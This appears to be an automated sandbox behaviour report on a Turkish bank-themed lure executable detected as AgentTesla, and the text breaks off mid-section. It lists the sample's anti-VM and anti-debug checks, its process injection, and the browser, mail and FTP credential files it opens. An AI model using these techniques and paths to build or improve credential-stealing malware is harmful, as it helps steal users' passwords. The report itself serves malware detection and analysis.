                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Found evasive API chain (trying to detect sleep duration tampering with parallel thread)Show sources
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeFunction Chain: threadResumed,threadDelayed,memAlloc,memAlloc,systemQueried,systemQueried,threadCreated,threadResumed,threadDelayed,threadDelayed,threadDelayed,systemQueried,systemQueried,threadDelayed,threadDelayed,threadDelayed,threadDelayed,systemQueried,threadDelayed,systemQueried,threadAPCQueued,threadDelayed,threadDelayed,threadDelayed,systemQueried
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeFunction Chain: systemQueried,threadCreated,threadResumed,threadDelayed,threadDelayed,threadDelayed,systemQueried,systemQueried,threadDelayed,threadDelayed,threadDelayed,threadDelayed,systemQueried,threadDelayed,systemQueried,threadAPCQueued,threadDelayed,threadDelayed,threadDelayed,systemQueried,threadDelayed,threadDelayed,threadDelayed,threadDelayed,memAlloc
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 6116Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 6116Thread sleep time: -4170000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 6116Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 6116Thread sleep time: -57562s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeWindow / User API: threadDelayed 544Jump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_00405D7C FindFirstFileA,FindClose,0_2_00405D7C
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004053AA
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_00402630 FindFirstFileA,0_2_00402630
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_00404A29 FindFirstFileExW,3_2_00404A29
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 30000Jump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 30000Jump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeAPI call chain: ExitProcess graph end nodegraph_0-3615
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeAPI call chain: ExitProcess graph end nodegraph_0-3616
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeAPI call chain: ExitProcess graph end nodegraph_3-55449
                      Source: Ziraat Bankasi Swift Mesaji.exe, 00000003.00000003.481381105.0000000005464000.00000004.00000001.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000003.00000003.481221494.0000000005451000.00000004.00000001.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000003.00000002.554817015.0000000005466000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: Ziraat Bankasi Swift Mesaji.exe, 00000003.00000003.481381105.0000000005464000.00000004.00000001.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000003.00000003.481221494.0000000005451000.00000004.00000001.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000003.00000002.554817015.0000000005466000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0040446F
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405DA3
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_004067FE GetProcessHeap,3_2_004067FE
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_0019E986 mov eax, dword ptr fs:[00000030h]0_2_0019E986
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_0019E772 mov eax, dword ptr fs:[00000030h]0_2_0019E772
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_0019EAB4 mov eax, dword ptr fs:[00000030h]0_2_0019EAB4
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_0019EA37 mov eax, dword ptr fs:[00000030h]0_2_0019EA37
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_0019EA76 mov eax, dword ptr fs:[00000030h]0_2_0019EA76
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_004035F1 mov eax, dword ptr fs:[00000030h]3_2_004035F1
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_00823CC0 LdrInitializeThunk,3_2_00823CC0
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_00401E1D SetUnhandledExceptionFilter,3_2_00401E1D
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0040446F
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00401C88
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00401F30

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeMemory written: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess created: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" Jump to behavior
                      Source: Ziraat Bankasi Swift Mesaji.exe, 00000003.00000002.552656445.0000000000EF0000.00000002.00020000.sdmpBinary or memory string: uProgram Manager
                      Source: Ziraat Bankasi Swift Mesaji.exe, 00000003.00000002.552656445.0000000000EF0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: Ziraat Bankasi Swift Mesaji.exe, 00000003.00000002.552656445.0000000000EF0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: Ziraat Bankasi Swift Mesaji.exe, 00000003.00000002.552656445.0000000000EF0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_0040208D cpuid 3_2_0040208D
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_00401B74 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_00401B74
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,StrCmpNIW,lstrlenA,0_2_00405AA7
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_00A8BB16 GetUserNameW,3_2_00A8BB16

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 3.2.Ziraat Bankasi Swift Mesaji.exe.37f3258.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.1.Ziraat Bankasi Swift Mesaji.exe.415058.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Ziraat Bankasi Swift Mesaji.exe.415058.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.30a1458.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3090000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Ziraat Bankasi Swift Mesaji.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Ziraat Bankasi Swift Mesaji.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Ziraat Bankasi Swift Mesaji.exe.4930000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.1.Ziraat Bankasi Swift Mesaji.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Ziraat Bankasi Swift Mesaji.exe.415058.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.1.Ziraat Bankasi Swift Mesaji.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Ziraat Bankasi Swift Mesaji.exe.4930000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Ziraat Bankasi Swift Mesaji.exe.415058.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Ziraat Bankasi Swift Mesaji.exe.37f3258.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Ziraat Bankasi Swift Mesaji.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Ziraat Bankasi Swift Mesaji.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.30a1458.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Ziraat Bankasi Swift Mesaji.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Ziraat Bankasi Swift Mesaji.exe.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Ziraat Bankasi Swift Mesaji.exe.5446f0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Ziraat Bankasi Swift Mesaji.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3090000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Ziraat Bankasi Swift Mesaji.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Ziraat Bankasi Swift Mesaji.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Ziraat Bankasi Swift Mesaji.exe.415058.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Ziraat Bankasi Swift Mesaji.exe.5446f0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Ziraat Bankasi Swift Mesaji.exe.415058.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Ziraat Bankasi Swift Mesaji.exe.415058.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.1.Ziraat Bankasi Swift Mesaji.exe.415058.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Ziraat Bankasi Swift Mesaji.exe.4970000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.554087278.00000000037F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.551571985.0000000000508000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.292334595.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.554248422.0000000004930000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000001.292756258.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.291447047.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.554299855.0000000004972000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.548601003.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.294724890.0000000003090000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.552826458.00000000027F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 6988, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 7108, type: MEMORYSTR
                      Tries to steal Mail credentials (via file / registry access)Show sources
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: Yara matchFile source: 00000003.00000002.552826458.00000000027F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 7108, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 3.2.Ziraat Bankasi Swift Mesaji.exe.37f3258.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.1.Ziraat Bankasi Swift Mesaji.exe.415058.1.unpack, type: UNPACKEDPE
